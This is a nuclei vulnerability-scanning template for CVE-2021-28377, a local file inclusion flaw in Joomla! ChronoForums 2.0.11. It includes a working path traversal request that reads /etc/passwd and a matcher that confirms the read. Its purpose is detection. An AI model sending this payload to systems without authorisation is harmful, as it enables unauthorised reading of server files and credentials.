nuclei-templates/http/cves/2021/CVE-2021-28377.yaml

44 lines
1.6 KiB
YAML

id: CVE-2021-28377
info:
name: Joomla! ChronoForums 2.0.11 - Local File Inclusion
author: 0x_Akoko
severity: medium
description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials.
remediation: |
Update Joomla! ChronoForums to the latest version (2.0.12) or apply the provided patch to fix the LFI vulnerability.
reference:
- https://herolab.usd.de/en/security-advisories/usd-2021-0007/
- https://nvd.nist.gov/vuln/detail/CVE-2021-28377
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2021-28377
cwe-id: CWE-22
epss-score: 0.00158
epss-percentile: 0.52156
cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:*
metadata:
max-request: 1
vendor: chronoengine
product: chronoforums
framework: joomla
tags: cve,cve2021,chronoforums,lfi,joomla
http:
- method: GET
path:
- "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100873de7156e0e6e8a93f20b854af4a84d65930044259df6e0912c2388fc080732022100d540c3b23ac3e1f27b792e00e1749ca8e17771fa75bb66444993befe1e8e3a27:922c64590222798bb761d5b6d8e72950